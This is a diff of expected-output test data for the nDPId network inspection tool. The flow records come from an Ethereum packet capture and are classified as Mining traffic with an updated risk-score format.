+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":470,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508364523,"flow_last_seen":1578508365656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364922,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
